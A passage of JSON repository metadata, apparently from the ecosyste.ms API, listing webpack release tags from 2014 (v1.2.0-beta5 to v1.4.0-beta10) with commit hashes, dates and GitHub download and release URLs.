ta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.